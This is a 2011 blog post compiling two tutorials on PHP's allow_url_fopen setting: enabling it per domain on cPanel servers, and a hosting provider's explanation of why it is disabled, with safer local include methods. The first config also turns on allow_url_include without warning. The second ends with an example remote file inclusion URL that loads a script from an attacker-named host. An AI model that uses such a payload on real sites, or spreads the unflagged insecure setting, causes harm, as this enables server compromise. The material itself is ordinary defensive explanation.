Wednesday, July 13, 2011

How to enable allow_url_fopen for a single domain on a cPanel server?

SkyHi @ Wednesday, July 13, 2011

The way to enable allow_url_fopen on a phpsuexec and a non-phpsuexec server is different. For security reasons the option is mostly disabled server wide, however, you can turn it ON for a single domain/account incase it is required.

Here how it needs to be done.
  • On a non phpsuexec server:
Goto the /usr/local/apache/conf/ directory,
# cd /usr/local/apache/conf/
see if you have a “userdata” directory there? If not, create the “userdata/<username>” directory and then the file allowurl.conf inside it. So the complete path should look like:
# pico /usr/local/apache/conf/userdata/<username>/allowurl.conf
and add the following to the file
<IfModule mod_php5.c>
 php_admin_value allow_url_fopen On
 php_admin_value allow_url_include On
</IfModule> 
Now, edit the Apache configuration file and scroll down to the VirtualHost entry of the domain. Include the path of the above created file in it, as shown below:
Include "/usr/local/apache/conf/userdata/<username>/allowurl.conf"
Save the file and rebuild the apache configuration
# /usr/local/cpanel/bin/apache_conf_distiller --update
# /usr/local/cpanel/bin/build_apache_conf
# /scripts/restartsrv httpd
This will enable allow_url_fopen for that domain.
  • On a PhpSuExec Or SuPHP server:


On a SuPHP enabled server, turning ON allow_url_fopen in the VirtualHost entry won’t work since PHP is not working as a Apache Handler anymore.
In such a case, copy the global php.ini of the server under directory of the domain, say public_html (you need to copy php.ini to the directory, where your script with allow_url_fopen resides)
# cp /usr/local/lib/php.ini /home/<username>/public_html/
Edit the new php.ini file and enable allow_url_fopen in it
allow_url_fopen = On
Save the file. Thats it.
BTW, replace “<username>” with the actual username of the domain wherever stated

REFERENCES
http://linuxhostingsupport.net/blog/how-to-enable-allow_url_fopen-for-a-single-domain-on-a-cpanel-server


The PHP option allow_url_fopen would normally allow a programmer to open, include or otherwise use a remote file using a URL rather than a local file path. For security reasons, AUSWEB has disabled this feature; however, a feature-rich alternative exists in the form of the bundled cURL library

Server-Side Includes
Many developers include files by pointing to a remote URL, even if the file is within the local system. For example:
<?php include("http://example.com/includes/example_include.php"); ?>
With allow_url_fopen disabled, this method will not work. Instead, the file must be included with a local path, and there are three methods of doing this:
  1. By using a relative path, such as ../includes/example_include.php.
  2. By using an absolute path (also known as relative-from-root), such as /home/username/example.com/includes/example_include.php.
  3. By using the PHP environment variable $_SERVER['DOCUMENT_ROOT'], which returns the absolute path to the web root directory. This is by far the best (and most portable) solution. The example that follows shows the environment variable in action:

Processing Differences (and passing variables to an included file)
It is worth mentioning that the alternative solutions presented here will result in a difference in the way the include() function is handled. The alternative solutions all return the PHP code from the included page; however, the now-unavailable remote URL method returns the result from the included page. One result of this behavior is that you cannot pass a querystring using the alternative solutions. You define the variables locally before performing the include:

Example
To achieve the effect of this:
<?php include("http://yourdomain.com/includes/example_include.php?var=example"); ?>
 

You must instead use this:
<?php
$var = "example";
include($_SERVER['DOCUMENT_ROOT']."/includes/example_include.php");
?>
 

Example exploitation
If allow_url_fopen is enabled, this system can be exploited by simply changing the value of the variable in the querystring:

http://yourdomain.com/index.php?page=http://crackerscum.net/evilscript.txt
 
 
REFERENCES
http://tutorials.ausweb.com.au/web/Tutorials/PHP-and-MySql/Security-issues---allow_url_fopen/